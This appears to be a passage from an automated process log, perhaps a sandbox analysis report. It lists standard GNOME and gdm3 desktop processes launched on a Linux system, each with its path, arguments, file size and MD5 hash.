                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                        File size:22760 bytes
                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                        Start time (UTC):16:03:02
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/libexec/gnome-session-binary
                                                        Arguments:-
                                                        File size:334664 bytes
                                                        MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                        Start time (UTC):16:03:02
                                                        Start date (UTC):01/01/2025
                                                        Path:/bin/sh
                                                        Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):16:03:02
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/libexec/gsd-rfkill
                                                        Arguments:/usr/libexec/gsd-rfkill
                                                        File size:51808 bytes
                                                        MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                        Start time (UTC):16:03:04
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/sbin/gdm3
                                                        Arguments:-
                                                        File size:453296 bytes
                                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                        Start time (UTC):16:03:04
                                                        Start date (UTC):01/01/2025
                                                        Path:/etc/gdm3/PrimeOff/Default
                                                        Arguments:/etc/gdm3/PrimeOff/Default
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):16:03:04
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/sbin/gdm3
                                                        Arguments:-
                                                        File size:453296 bytes
                                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                        Start time (UTC):16:03:04
                                                        Start date (UTC):01/01/2025
                                                        Path:/etc/gdm3/PrimeOff/Default
                                                        Arguments:/etc/gdm3/PrimeOff/Default
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c